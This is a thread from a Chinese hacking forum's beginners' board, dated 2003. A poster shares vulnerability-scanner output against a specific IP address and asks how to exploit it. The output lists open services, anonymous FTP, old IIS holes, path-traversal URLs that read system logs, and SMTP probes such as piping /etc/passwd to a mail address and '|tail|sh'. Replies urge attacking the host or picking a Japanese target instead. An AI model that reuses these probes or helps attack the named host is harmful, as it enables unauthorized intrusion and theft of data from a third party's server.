论坛: 菜鸟乐园 标题: 谁能告诉我怎么利用这些东西呀????? 复制本贴地址    
作者: wskli [wskli]       登录
探测主机:61.186.152.33
检测 SMTP-> 支持VRFY
FTP匿名检测-> 61.186.152.33 允许匿名登陆
检测 SMTP->61.186.152.33 250 Server403A Hello [211.162.154.80]

检测 Port-> 61.186.152.33 端口 21 [ftp] 开放 ...OK
检测 SMTP->61.186.152.33 检测debug漏洞 500 5.3.3 Unrecognized command

检测 Port-> 61.186.152.33 端口 25 [smtp] 开放 ...OK
检测 Port-> 61.186.152.33 端口 80 [http] 开放 ...OK
检测 Port-> 61.186.152.33 端口 443 [https] 开放 ...OK
服务检测 FTP-> 220 Server403A Microsoft FTP Service (Version 5.0).
检测 SMTP->61.186.152.33 检测kill漏洞 500 5.3.3 Unrecognized command

服务检测 HTTP-> Microsoft-IIS/5.0
检测 SMTP->61.186.152.33 检测wiz漏洞 500 5.3.3 Unrecognized command

发现NULL.printer漏洞-> 61.186.152.33 IIS5.0 NULL.printer Exploit ...OK
发现CGI漏洞-> 61.186.152.33/*.ida (200)...OK
发现CGI漏洞-> 61.186.152.33/*.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/?PageServices (200)...OK
检测 SMTP->61.186.152.33 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first

检测 SMTP->61.186.152.33 检测+ +漏洞 500 5.3.3 Unrecognized command

检测 SMTP->61.186.152.33 检测RSET漏洞 250 2.0.0 Resetting

检测 SMTP->61.186.152.33 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments

检测 SMTP->61.186.152.33 检测RSET漏洞 250 2.0.0 Resetting

检测 SMTP->61.186.152.33 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@Server403A....Sender OK

发现CGI漏洞-> 61.186.152.33/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 61.186.152.33/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full (200)...OK
服务检测 SMTP-> 220 Server403A Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at  Sat, 22 Nov 2003 16:20:54 +0800
发现CGI漏洞-> 61.186.152.33/?wp-cs-dump (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-start-ver (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-stop-ver (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-uncheckout (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-usr-prop (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-ver-diff (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-verify-link (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-ver-info (200)...OK
发现CGI漏洞-> 61.186.152.33/abczxv.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/blabla.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/?wp-html-rend (200)...OK
发现CGI漏洞-> 61.186.152.33/iishelp/iis/misc/iirturnh.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/exair/search/qfullhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/exair/search/query.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/exair/search/qsumrhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/exair/search/search.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/issamples/fastq.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/issamples/oop/qfullhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/issamples/oop/qsumrhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/author.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/filesize.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/filetime.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/qfullhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/query.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/queryhit.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/iissamples/issamples/query.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/qsumrhit.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/scripts/samples/search/simple.idq (200)...OK
发现CGI漏洞-> 61.186.152.33/null.htw (200)...OK
发现CGI漏洞-> 61.186.152.33/prxdocs/misc/prxrch.idq (200)...OK


地主 发表时间: 11/23 12:41

回复: lida1818 [lida1818]   论坛用户   登录
换个小日本的IP吧!想黑自己的?

B1层 发表时间: 11/23 12:53

回复: dupi [dupi]   论坛用户   登录

这年头有这样的主机真是不容易呀

B2层 发表时间: 11/23 15:38

回复: afan271314 [afan271314]   论坛用户   登录
就这样的主机  如果咱不弄  要是让小日本发现  中国人的脸都丢光了

B3层 发表时间: 11/23 17:21

回复: wskli [wskli]      登录
那我应该怎么做呀???

B4层 发表时间: 11/23 17:28

回复: clcpxq [clcpxq]   论坛用户   登录
牛比~~你是不是锈豆了~~

B5层 发表时间: 11/23 19:40

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号